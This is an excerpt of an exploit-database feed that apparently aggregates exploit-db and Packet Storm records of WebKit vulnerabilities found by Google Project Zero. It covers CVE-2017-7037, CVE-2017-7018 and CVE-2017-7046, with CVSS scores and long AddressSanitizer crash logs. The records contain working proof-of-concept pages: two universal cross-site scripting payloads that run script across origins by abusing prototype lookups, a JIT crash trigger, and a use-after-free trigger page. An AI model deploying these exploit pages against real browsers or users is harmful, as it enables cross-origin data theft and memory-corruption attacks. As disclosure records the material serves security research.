fa fa fa fa fa fa fa\r\n 0x1c1800016df0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n=>0x1c1800016e00: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd\r\n 0x1c1800016e10: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa\r\n 0x1c1800016e20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x1c1800016e30: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00\r\n 0x1c1800016e40: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa\r\n 0x1c1800016e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: 
cb\r\n==29516==ABORTING\r\n=================================================================\r\n-->", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/42362/"}], "packetstorm": [{"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC JSObject::putInlineSlow / JSValue::putToPrimitive XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7037"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143482", "href": "https://packetstormsecurity.com/files/143482/WebKit-JSC-JSObject-putInlineSlow-JSValue-putToPrimitive-XSS.html", "sourceData": "`WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive \n \nCVE-2017-7037 \n \n \nJSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called. \n \nThe PoC shows how to call a setter of another origin's object. 
\n \nPoC 1 - JSValue::putToPrimitive: \n<body> \n<script> \n \nlet f = document.body.appendChild(document.createElement('iframe')); \nlet loc = f.contentWindow.location; \nf.onload = () => { \nlet a = 1.2; \na.__proto__.__proto__ = f.contentWindow; \n \na['test'] = {toString: function () { \narguments.callee.caller.constructor('alert(location)')(); \n}}; \n}; \nf.src = 'data:text/html,' + `<iframe></iframe><script> \nObject.prototype.__defineSetter__('test', v => { \n'a' + v; \n}); \n \n</scrip` + `t>`; \n \n</script> \n</body> \n \n \nPoC 2 - JSObject::putInlineSlow: \n<body> \n<script> \n \nlet f = document.body.appendChild(document.createElement('iframe')); \nlet loc = f.contentWindow.location; \nf.onload = () => { \nlet a = { \n__proto__: f.contentWindow \n}; \n \na['test'] = {toString: function () { \narguments.callee.caller.constructor('alert(location)')(); \n}}; \n}; \nf.src = 'data:text/html,' + `<iframe></iframe><script> \nObject.prototype.__defineSetter__('test', v => { \n'a' + v; \n}); \n \n</scrip` + `t>`; \n</script> \n</body> \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. 
\n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143482/GS20170725045736.txt"}, {"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit JSC Incorrect Scope Register Handling", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7018"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143478", "href": "https://packetstormsecurity.com/files/143478/WebKit-JSC-Incorrect-Scope-Register-Handling.html", "sourceData": "` WebKit: JSC: Incorrect scope register handling in DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry) \n \nCVE-2017-7018 \n \n \nHere's a snippet of DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry). \n \nvoid flush(InlineStackEntry* inlineStackEntry) \n{ \n... \nif (m_graph.needsScopeRegister()) \nflush(m_codeBlock->scopeRegister()); <<--- (a) \n} \n \nAt (a), it should flush the scope register of |inlineStackEntry->m_codeBlock| instead of |m_codeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry->m_codeBlock| may have an incorrect offset in the stack layout phase. \n \nPoC: \nfunction f() { \n(function () { \neval('1'); \nf(); \n}()); \n \nthrow 1; \n} \n \nf(); \n \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. 
\n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143478/GS20170725014438.txt"}, {"lastseen": "2017-07-26T22:47:05", "description": "", "published": "2017-07-25T00:00:00", "type": "packetstorm", "title": "WebKit WebCore::RenderObject Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7046"], "modified": "2017-07-25T00:00:00", "id": "PACKETSTORM:143488", "href": "https://packetstormsecurity.com/files/143488/WebKit-WebCore-RenderObject-Use-After-Free.html", "sourceData": "` WebKit: use-after-free in WebCore::RenderObject with accessibility enabled \n \nCVE-2017-7046 \n \n \nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on an ASan build of WebKit nightly. \n \nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default. 
\n \nPoC: \n \n================================================================= \n \n<style> \n#link { text-transform: lowercase; } \nlink::first-letter { border-spacing: 1em; } \n</style> \n<script> \nfunction go() { \ndt.appendChild(link); \nvar s = link.style; \ns.setProperty(\"display\", \"table-column-group\"); \ns.setProperty(\"-webkit-appearance\", \"menulist-button\"); \n} \nfunction eventhandler() { \ndir.setAttribute(\"aria-labeledby\", \"meta\"); \nlink.appendChild(table.rows[0]); \n} \n</script> \n<body onload=go()> \n<link id=\"link\"> \n<meta id=\"meta\"> \n<dir id=\"dir\"> \n<table id=\"table\"> \n<th>1</th> \n<dt id=\"dt\"> \n<iframe onload=\"eventhandler()\"></iframe> \n \n================================================================= \n \nASan log: \n \n================================================================= \n==30692==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000090ac8 at pc 0x00010841ba26 bp 0x7fff5ca8ea60 sp 0x7fff5ca8ea58 \nREAD of size 4 at 0x608000090ac8 thread T0 \n==30692==WARNING: invalid path to external symbolizer! \n==30692==WARNING: Failed to use and restart external symbolizer! 
\n#0 0x10841ba25 in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25) \n#1 0x10a8983fe in WebCore::RenderElement::addChild(WebCore::RenderObject*, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24e73fe) \n#2 0x10ab7d6ec in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6ec) \n#3 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057) \n#4 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa) \n#5 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b) \n#6 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9) \n#7 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287) \n#8 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce) \n#9 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c) \n#10 0x108b3e493 in 
WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493) \n#11 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0) \n#12 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093) \n#13 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386) \n#14 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) \n#15 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) \n#16 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) \n#17 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) \n#18 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) \n#19 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) \n#20 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) \n#21 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5) \n#22 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888) \n#23 0x1162c0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312) \n#24 0x1162c0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41) \n#25 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0) \n#26 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc) \n#27 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5) \n#28 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3) \n#29 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) \n#30 0x7fffd24b6cf0 in ReceiveNextEventCommon 
(/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) \n#31 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) \n#32 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23) \n#33 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d) \n#34 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa) \n#35 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd) \n#36 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) \n#37 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) \n#38 0x10316c56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) \n#39 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) \n \n0x608000090ac8 is located 40 bytes inside of 96-byte region [0x608000090aa0,0x608000090b00) \nfreed by thread T0 here: \n#0 0x1031d4294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) \n#1 0x116307f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30) \n#2 0x10a79d874 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderElement*, WebCore::RenderText*) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ec874) \n#3 0x10a79e15a in WebCore::RenderBlock::updateFirstLetter(WebCore::RenderBlock::RenderTreeMutationIsAllowed) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ed15a) \n#4 0x10a783761 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d2761) \n#5 0x10a80333f in WebCore::RenderBlockFlow::layoutLineBoxes(bool, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245233f) \n#6 0x10a7ca957 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419957) \n#7 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7) \n#8 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c) \n#9 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522) \n#10 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962) \n#11 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7) \n#12 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, 
WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c) \n#13 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522) \n#14 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962) \n#15 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7) \n#16 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c) \n#17 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522) \n#18 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962) \n#19 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7) \n#20 0x10a7cfd9c in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241ed9c) \n#21 0x10a7cc522 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x241b522) \n#22 0x10a7ca962 in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2419962) \n#23 0x10a7837d7 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23d27d7) \n#24 0x10ab8536d in WebCore::RenderView::layoutContent(WebCore::LayoutState const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d436d) \n#25 0x10ab85b74 in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d4b74) \n#26 0x108f00943 in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4f943) \n#27 0x108b1a1d0 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7691d0) \n#28 0x108b207b2 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2) \n#29 0x108cd3b21 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x922b21) \n \npreviously allocated by thread T0 here: \n#0 0x1031d3d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) \n#1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) \n#2 0x116311ae4 in bmalloc::DebugHeap::malloc(unsigned long) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4) \n#3 0x116306c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d) \n#4 0x11629c437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437) \n#5 0x11629b768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768) \n#6 0x1085bb548 in WebCore::RenderObject::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a548) \n#7 0x10b157c4d in WebCore::RenderPtr<WebCore::RenderText> WebCore::createRenderer<WebCore::RenderText, WebCore::Text&, WTF::String const&>(WebCore::Text&&&, WTF::String const&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6c4d) \n#8 0x10b157aae in WebCore::Text::createTextRenderer(WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2da6aae) \n#9 0x10ab7d6a4 in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6a4) \n#10 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057) \n#11 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa) \n#12 0x10ab7a47b in 
WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b) \n#13 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9) \n#14 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287) \n#15 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce) \n#16 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c) \n#17 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493) \n#18 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0) \n#19 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093) \n#20 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386) \n#21 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) \n#22 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) \n#23 
0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) \n#24 0x105ec22eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) \n#25 0x105ec5689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) \n#26 0x105ec4ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) \n#27 0x105765683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) \n#28 0x10550f3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5) \n#29 0x105518888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888) \n \nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25) in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const \nShadow bytes around the buggy address: \n0x1c1000012100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 
